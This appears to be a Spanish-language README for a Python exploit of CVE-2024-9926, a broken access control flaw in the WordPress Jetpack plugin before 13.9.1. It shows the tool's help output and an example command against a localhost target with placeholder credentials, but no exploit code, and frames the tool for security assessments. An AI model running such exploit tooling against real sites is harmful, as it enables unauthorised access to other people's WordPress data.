
Explota el control de acceso defectuoso de Jetpack < 13.9.1 (CVE-2024-9926).
Este es un programa en Python3 que explota la vulnerabilidad de control de acceso roto en Jetpack < 13.9.1 (CVE-2024-9926).
Esta herramienta está pensada para ingenieros de seguridad y personal de AppSec para evaluaciones de seguridad. Úsala de forma responsable. No me hago responsable del uso que cualquier persona haga de esta aplicación. NO soy responsable de los daños causados ni de los delitos cometidos mediante el uso de esta herramienta.
$ ./exploit.py --help
usage: exploit.py [-h] -t TARGET -u USERNAME -ap APPLICATION_PASSWORD [-v]
Exploit for Jetpack < 13.9.1 broken access control vulnerability. - v1.0 (2024-11-01)
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL of the target WordPress
-u USERNAME, --username USERNAME
Username of WordPress
-ap APPLICATION_PASSWORD, --application-password APPLICATION_PASSWORD
Application Password generated for the user (it's NOT the user password)
-v, --verbose verbose mode
./exploit.py -t https://localhost:1337 -u attacker -ap "AAAA 1111 bbbb 2222 CCCC 3333"
Se puede configurar una aplicación vulnerable usando este repositorio.
Consulta el archivo LICENSE para obtener más detalles.